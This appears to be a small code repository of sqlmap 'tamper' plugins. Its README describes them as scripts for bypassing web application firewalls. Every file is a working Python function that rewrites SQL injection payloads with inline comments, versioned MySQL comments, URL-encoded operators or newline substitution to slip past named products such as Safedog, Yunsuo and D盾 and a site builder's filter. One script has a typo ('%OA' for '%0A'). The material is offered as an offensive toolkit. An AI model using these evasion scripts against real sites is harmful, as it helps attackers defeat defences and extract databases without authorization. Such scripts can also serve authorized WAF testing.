├── README.md ├── freebuf安全狗绕过.py ├── sqlmap_bypass_云锁_tamper.py ├── sqlmap_bypass_安全狗_tamper.py ├── sqlmap_bypass_D盾_tamper.py └── sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper.py /README.md: -------------------------------------------------------------------------------- 1 | # sqlmap-tamper 2 | sqlmap绕过waf等脚本 3 | -------------------------------------------------------------------------------- /freebuf安全狗绕过.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | import re 9 | 10 | from lib.core.data import kb 11 | from lib.core.enums import PRIORITY 12 | 13 | __priority__ = PRIORITY.NORMAL 14 | 15 | def dependencies(): 16 | pass 17 | 18 | def tamper(payload, **kwargs): 19 | 20 | retVal = payload 21 | 22 | if payload: 23 | retVal = retVal.replace('UNION', 'uNiOn/*/%0a*a*/') 24 | retVal = retVal.replace('DATABASE()', 'dataBase/*!(*/)') 25 | retVal = retVal.replace('USER()', 'usEr/*!(*/)') 26 | retVal = retVal.replace(' ', '/**/') 27 | retVal = retVal.replace('OR', '/*!14400Or*/') 28 | retVal = retVal.replace('AND', '/*!14400aNd*/') 29 | 30 | return retVal 31 | -------------------------------------------------------------------------------- /sqlmap_bypass_云锁_tamper.py: -------------------------------------------------------------------------------- 1 | # coding=UTF-8 2 | # Desc: sqlmap bypass 云锁 tamper 3 | """ 4 | Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) 5 | See the file 'LICENSE' for copying permission 6 | """ 7 | 8 | import re 9 | 10 | from lib.core.data import kb 11 | from lib.core.enums import PRIORITY 12 | from lib.core.common import singleTimeWarnMessage 13 | from lib.core.enums import DBMS 14 | __priority__ = PRIORITY.LOW 15 | 16 | 17 | def dependencies(): 18 | pass 19 | 20 | 21 | def tamper(payload, **kwargs): 22 | payload = payload.replace('ORDER', '/*!00000order*/') 23 | payload = payload.replace('ALL SELECT', '/*!00000all*/ /*!00000select') 24 | payload = payload.replace('CONCAT(', "CONCAT/**/(") 25 | payload = payload.replace("--", " */--") 26 | payload = payload.replace("AND", "%26%26") 27 | return payload 28 | -------------------------------------------------------------------------------- /sqlmap_bypass_安全狗_tamper.py: -------------------------------------------------------------------------------- 1 | # coding=UTF-8 2 | # Desc: sqlmap_bypass_安全狗_tamper 3 | 4 | from lib.core.enums import PRIORITY 5 | from lib.core.settings import UNICODE_ENCODING 6 | __priority__ = PRIORITY.LOW 7 | def dependencies(): 8 | pass 9 | def tamper(payload, **kwargs): 10 | 11 | if payload: 12 | payload=payload.replace(" ","/*!*/") 13 | payload=payload.replace("=","/*!*/=/*!*/") 14 | payload=payload.replace("AND","/*!*/AND/*!*/") 15 | payload=payload.replace("UNION","union/*!88888cas*/") 16 | payload=payload.replace("#","/*!*/#") 17 | payload=payload.replace("USER()","USER/*!()*/") 18 | payload=payload.replace("DATABASE()","DATABASE/*!()*/") 19 | payload=payload.replace("--","/*!*/--") 20 | payload=payload.replace("SELECT","/*!88888cas*/select") 21 | payload=payload.replace("FROM","/*!99999c*//*!99999c*/from") 22 | print payload 23 | 24 | return payload 25 | -------------------------------------------------------------------------------- /sqlmap_bypass_D盾_tamper.py: -------------------------------------------------------------------------------- 1 | # coding=UTF-8 2 | # Desc: sqlmap_bypass_D盾_tamper 3 | 4 | from lib.core.enums import PRIORITY 5 | __priority__ = PRIORITY.LOW 6 | 7 | 8 | def dependencies(): 9 | pass 10 | 11 | 12 | def tamper(payload, **kwargs): 13 | """ 14 | BYPASS Ddun 15 | """ 16 | retVal = payload 17 | if payload: 18 | retVal = "" 19 | quote, doublequote, firstspace = False, False, False 20 | for i in xrange(len(payload)): 21 | if not firstspace: 22 | if payload[i].isspace(): 23 | firstspace = True 24 | retVal += "/*DJSAWW%2B%26Lt%3B%2B*/" 25 | continue 26 | elif payload[i] == '\'': 27 | quote = not quote 28 | elif payload[i] == '"': 29 | doublequote = not doublequote 30 | elif payload[i] == " " and not doublequote and not quote: 31 | retVal += "/*DJSAWW%2B%26Lt%3B%2B*/" 32 | continue 33 | retVal += payload[i] 34 | return retVal 35 | -------------------------------------------------------------------------------- /sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper.py: -------------------------------------------------------------------------------- 1 | # coding=UTF-8 2 | # Desc: sqlmap_bypass_某企业建站程序过滤_tamper 3 | 4 | """ 5 | Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) 6 | See the file 'LICENSE' for copying permission 7 | """ 8 | 9 | from lib.core.enums import PRIORITY 10 | 11 | __priority__ = PRIORITY.LOW 12 | 13 | def dependencies(): 14 | pass 15 | 16 | def tamper(payload, **kwargs): 17 | """ 18 | 把空格替换成换行符:%0A 19 | Replaces space character (' ') with comments '%0A' 20 | Tested against: 21 | * Microsoft SQL Server 2005 22 | * MySQL 4, 5.0 and 5.5 23 | * Oracle 10g 24 | * PostgreSQL 8.3, 8.4, 9.0 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | >>> tamper('SELECT id FROM users') 28 | 'SELECT%0Aid%0AFROM%0Ausers' 29 | """ 30 | 31 | retVal = payload 32 | 33 | if payload: 34 | retVal = "" 35 | quote, doublequote, firstspace = False, False, False 36 | 37 | for i in xrange(len(payload)): 38 | if not firstspace: 39 | if payload[i].isspace(): 40 | firstspace = True 41 | retVal += "/%OA/" 42 | continue 43 | 44 | elif payload[i] == '\'': 45 | quote = not quote 46 | 47 | elif payload[i] == '"': 48 | doublequote = not doublequote 49 | 50 | elif payload[i] == " " and not doublequote and not quote: 51 | retVal += "/%0A/" 52 | continue 53 | 54 | retVal += payload[i] 55 | 56 | return retVal 57 | --------------------------------------------------------------------------------